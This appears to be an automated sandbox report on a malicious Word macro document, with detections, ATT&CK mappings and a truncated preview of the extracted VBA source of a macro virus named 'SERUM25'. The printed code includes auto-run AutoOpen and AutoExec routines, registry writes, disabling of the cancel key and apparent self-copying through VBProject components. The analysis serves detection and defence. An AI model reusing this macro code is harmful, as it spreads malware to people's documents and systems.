MALICIOUS
300
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file is an Office document containing VBA macros, specifically an AutoOpen macro that utilizes CreateObject. This indicates an attempt to execute malicious code upon opening. The ClamAV detection as 'Doc.Trojan.Toraja-1' strongly suggests a known malicious family. The VBA script is designed to run automatically and likely serves as a downloader for further malicious activity.
Heuristics 6
-
ClamAV: Doc.Trojan.Toraja-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Toraja-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 50127 bytes |
SHA-256: 5048588d59b690f2bf473497f50648f113a780d0699959340bb1ccd41321ea69 |
|||
|
Detection
ClamAV:
Doc.Trojan.Toraja-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "SERUM25"
Option Explicit
Option Compare Text
Dim Komp As Variant
Public Const regApp As String = "Application"
Public Const regSecSet As String = "Settings"
Public Const regSecApp As String = "AppName"
Const TempVer As String = "HERU"
Const MacName As String = "SERUM"
Const Ver As String = "25"
Dim ctl As Variant
Global blnFound As Boolean
Dim CusProp
Dim blnMod As Boolean
Public Const TimerOn = "01:00:00"
Const Akhir = 5
Dim Caption As String
Dim actWindow
Global Active
Global Temp
Global TempPath
Dim Waktu
Dim Bar As Integer
Sub Register()
Attribute Register.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
If GetSetting(regApp, regSecSet, "FirstRun") = "" Then SaveSetting regApp, regSecSet, "FirstRun", Format(Date + 30, "dd-mm-yyyy")
If GetSetting(regApp, regSecSet, "Version") <> Ver Then SaveSetting regApp, regSecSet, "Version", Ver
If GetSetting(regApp, regSecSet, "UserKeyWord") <> MacName & Ver Then SaveSetting regApp, regSecSet, "UserKeyWord", ""
If GetSetting(regApp, regSecSet, "AuthorKeyWord") <> "Marsel" Then SaveSetting regApp, regSecSet, "AuthorKeyWord", ""
End Sub
'Function " "() As Boolean
'Dim getDate As Date
'On Error Resume Next
'getDate = GetSetting(regApp, regSecSet, "FirstRun")
'If getDate <= Date Then ShowMe
'End Function
Sub AutoExec()
Attribute AutoExec.VB_ProcData.VB_Invoke_Func = " \n14"
Application.EnableCancelKey = 0
Application.DisplayRecentFiles = False
SaveSetting regApp, regSecApp, "Microsoft Word", "True"
MenuWord
ExportXls
Register
Documents.Add
Application.OnTime Now + TimeValue(TimerOn), "OnTimer"
End Sub
On Error Resume Next
TempActive
ActiveWindow.View.Type = 3
End Sub
Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Dim strRun As String
Application.EnableCancelKey = 0
If PWords = False Then Application.ShowVisualBasicEditor = True
ActiveTemp
RemoveAll
MenuWord
Register
If blnFound = True Then
strRun = TempVer & Ver & "." & MacName & Ver & ".FoundIt"
Application.OnTime Now + TimeValue("00:01:00"), strRun
End If
End Sub
Function KeyWord() As Boolean
Attribute KeyWord.VB_ProcData.VB_Invoke_Func = " \n14"
If GetSetting(regApp, regSecSet, "UserKeyWord") = MacName & Ver Then KeyWord = True
End Function
Sub FileOpen()
Attribute FileOpen.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
WordBasic.enableAutoMacros 1
Dialogs(80).Show
TempActive
WordBasic.enableAutoMacros 0
End Sub
Function KompProject(Asal, Tujuan) As Boolean
Attribute KompProject.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo Salah
blnMod = False
For Each Komp In Tujuan.VBProject.VBComponents
If Komp.Name = MacName & Ver Then blnMod = True
If (Komp.Name <> "ThisDocument") And (Komp.Name <> "Reference To Normal") And (Komp.Name = "TOING12") And _
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.